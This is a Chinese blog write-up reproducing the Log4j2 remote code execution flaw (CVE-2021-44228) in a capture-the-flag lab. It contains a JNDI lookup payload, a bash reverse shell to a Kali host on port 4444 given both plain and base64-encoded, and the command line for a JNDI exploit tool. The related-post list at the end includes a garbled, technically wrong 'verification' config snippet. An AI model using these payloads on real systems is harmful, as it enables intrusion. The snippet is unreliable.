Log4j2-RCE漏洞复现——CVE-2021-44228

最新推荐文章于 2024-07-14 19:46:21 发布
最新推荐文章于 2024-07-14 19:46:21 发布
阅读量152 收藏
点赞数
文章标签: log4j linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Nuyoah_wy/article/details/131074455
版权

1,打开实验环境
在这里插入图片描述

2,DNSLog验证
①点击 ???,用burpsuit 进行抓包
在这里插入图片描述

②通过DNSLog平台获取到域名eqpshf.dnslog.cn
在这里插入图片描述

③构造payload:${jndi:ldap:// eqpshf.dnslog.cn},并使用Burpsuite进行抓包并替换payload参数
在这里插入图片描述

④通过Burpsuite自带的编码工具对其进行URL编码:
在这里插入图片描述
在这里插入图片描述

⑤编码后发送请求包:
在这里插入图片描述

⑥在DNSLog网站成功接收到解析记录:
在这里插入图片描述

3,JNDI注入反弹shell
①在kali中下载JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar进行漏洞利用
在这里插入图片描述

②使用反弹shell指令,kali的ip为192.168.10.129,port可使用任意未被占用的端口,此处指定为4444,

bash -i >& /dev/tcp/192.168.10.129/4444 0>&1

③将此条命令进行Java Runtime Bash 编码:

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjEyOS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}

在这里插入图片描述

④编码后的命令通过-C参数输入JNDI工具,通过通过-A参数指定kali的ip地址:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjEyOS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" -A 192.168.10.129

在这里插入图片描述

⑤在新的窗口监听4444端口:
在这里插入图片描述

⑥替换工具生成的payload:rmi://192.168.10.129:1099/10a1qt 到Burpsuite:
在这里插入图片描述

⑦编码后发送到靶机:

在这里插入图片描述

⑧kali的监听窗口成功接收到反弹的shell:
在这里插入图片描述

⑨输入find / -name flag* ,成功得到flag

在这里插入图片描述

little sweet1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
log4j2-rce靶场.zip
01-16
在靶场中,安全专业人员可以模拟攻击者的行为,发现系统和应用的漏洞,并进行渗透测试,从而及时修复和改进防御机制。同时,这也为防御方提供了锻炼机会,通过对抗攻击提高防御能力。 靶场的搭建还促进了团队协作与...
漏洞复现——log4j2-rceCVE-2021-44228
小林说安全的博客
05-29 1993
漏洞复现——log4j2-rceCVE-2021-44228
Apache Log4j2 (CVE-2021-44228)漏洞详细复现过程
weixin_46622976的博客
12-13 7006
首先我们要理解漏洞产生的原因,存在漏洞的机器为LDAP客户端,我们构造payload地址为自己的LDAP服务端,自己服务端会去HTTP服务器加载恶意文件。(验证的话,payload直接为DNS服务器即可) 以github上项目为例:GitHub - tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce: Apache Log4j 远程代码执行 一、编译exp,并放置在HTTP服务器,等待LDAP服务器来下载 git clone https://gith...
CVE-2021-44228)Apache_Log4j2_RCE漏洞复现(反弹shell教学)
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
01-10 7245
Log4j2 组件在处理程序日志记录时存在JNDI 注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2 组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。本文是log4j2漏洞复现以及利用该漏洞进行命令执行RCE,反弹shell。
CVE-2021-44228——Log4j2-RCE漏洞复现
Li-D的博客
06-10 1782
Apache Log4j2是一个Java的日志组件,在特定的版本中由于其启用了lookup功能,从而导致产生远程代码执行漏洞
CVE-2021-44228——Vulfocus-Log4j RCE漏洞复现
热门推荐
LiBai'S BLOG
01-05 2万+
这里写目录标题VuofocusDnslog出网测试JNDI注入反弹shell Vuofocus http://vulfocus.fofa.so/ 启动靶场 Dnslog出网测试 http://www.dnslog.cn/ payload GET方式提交 payload payload=${jndi:ldap://X.X.X.X/exp} payload=${jndi:ldap://5e0s0v.dnslog.cn/exp} 用payload打的时候发现服务器返回404 原因是因为GET数据传输
CVE-2021-44228——Vulfocus-Log4j RCE漏洞复现_vulfous中cve-2021-44228
2401_84519907的博客
05-16 267
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
CVE-2021-44228——Vulfocus-Log4j RCE漏洞复现_vulfous中cve-2021-44228(1)
2401_84519859的博客
05-16 233
需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/topics/618540462)**用payload打的时候发现服务器返回404。反弹shell命令进行了base64编码。原因是因为GET数据传输要URL编码。替换JNDI中对应的payloadpayload GET方式提交。反弹shell成功拿到flag。URL编码后提交正常。DNSlog成功回显。
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http:
Log4j2 RCE漏洞分析
03-14
记录一下log4j2 RCE的原理
logging-log4j2-log4j-2.16.0-rc1.zip
12-13
2021年12月初,Log4j中的一个名为CVE-2021-44228的严重漏洞被公开,这被称为"Log4Shell"漏洞。它源于Log4j的JNDI(Java Naming and Directory Interface)查找功能,当恶意用户在日志记录中插入特定的字符串时,...
单一职责原则
最新发布
qq_42798343的博客
07-14 270
单一职责原则是面向对象设计中的基本原则之一,通过将类的职责进行分离,可以提高代码的可维护性、可复用性和可测试性。在实际开发中,遵循单一职责原则有助于我们写出高质量的代码。希望这个例子对你写博客有所帮助。如果你有任何问题或需要进一步的例子,请随时告诉我!
【ROS2】测试
cxyhjl的博客
07-13 557
为什么要进行自动化测试?以下是我们应该进行自动化测试的许多重要原因之一:您可以更快地对代码进行增量更新。ROS 有数百个包,具有许多相互依赖关系,因此很难预见一个小变化可能引起的问题。如果您的更改通过了单元测试,您可以更有信心地认为您没有引入问题——或者至少问题不是您的错。您可以更自信地重构代码。通过单元测试可以验证您在重构时没有引入任何错误。这让您摆脱了对变化的恐惧,获得了这种美妙的自由!它导...
设计模式的七大原则
m0_52226803的博客
07-12 1021
现在,如果需要添加新的图表类型(例如饼状图),只需创建一个新的类(如PieChart),让它继承自AbstractChart,并实现display()方法。面向对象的开发很好的解决了这个问题,一般情况下抽象的变化概率很小,让用户程序依赖于抽象,实现的细节也依赖于抽象。类中该方法的预期行为(比如,没有改变车辆启动的基本含义或引入不可接受的行为变更,即车开起来细化一下,可以是汽车,公交车,卡车开起来,但都比车这个范围更小更细化),这就遵循了里氏替换原则。这样可以减少不必要的耦合,提高系统的灵活性和可维护性。
如何调试 Python 代码
Itmastergo的博客
07-12 954
调试Python代码的方法多种多样,从简单的打印语句到使用高级调试器,每种方法都有其适用场景。使用打印语句print调试)使用日志模块logging使用Python内置调试器pdb集成开发环境(IDE)调试工具单元测试和断言。
Log4j的原理及应用详解(四)
凛鼕将至的博客
07-13 1050
Log4j是Apache的一个开源项目,它是一个可靠、快速、灵活的日志框架(API),主要用于Java语言编写的应用程序中。始于1996年,作为记录E.U. SEMPER(Secure Electronic Marketplace for Europe)项目跟踪信息的API。经过大量的完善和蜕变,最终演进为Log4j。 本文将跟随《Log4j的原理及应用详解(三)》的进度,继续介绍Log4j。希望通过本系列文章的学习,您将能够更好地理解Log4j的内部工作原理,掌握Log4j的使用技巧,
@RequiredArgsConstructor实现构造器注入
qq_44013675的博客
07-11 824
RequiredArgsConstructor实现构造器注入。
Apache Log4j2 Remote Code Execution (CVE-2021-44228)如何验证
06-06
Apache Log4j2 远程代码执行漏洞CVE-2021-44228)可以通过以下步骤进行验证: 1. 构造一个恶意的日志信息,包含以下内容: ``` <appender name="RCE" class="org.apache.log4j.ConsoleAppender"> <param name="Target" value="System.out"/> <param name="immediateFlush" value="true"/> <layout class="org.apache.logging.log4j.core.layout.PatternLayout"> <param name="ConversionPattern" value="%d{yyyy-MM-dd HH:mm:ss.SSS} [%t] %-5level %logger{36}:%line - %msg%n"/> </layout> <filter class="org.apache.logging.log4j.core.filter.AbstractFilterable"> <filter class="org.apache.logging.log4j.core.filter.GroovyFilter"> <param name="script" value="new java.lang.ProcessBuilder(['calc']).start()"/> </filter> </filter> </appender> <root level="info"> <appender-ref ref="RCE"/> </root> ``` 2. 将恶意日志信息发送到漏洞受影响的 Log4j2 服务端,例如通过网络或者文件系统等方式。 3. 如果服务端受到影响,则会执行恶意脚本,例如在 Windows 上弹出计算器。 请注意,验证漏洞时需要遵守法律法规和道德准则,不得对未授权的系统进行测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值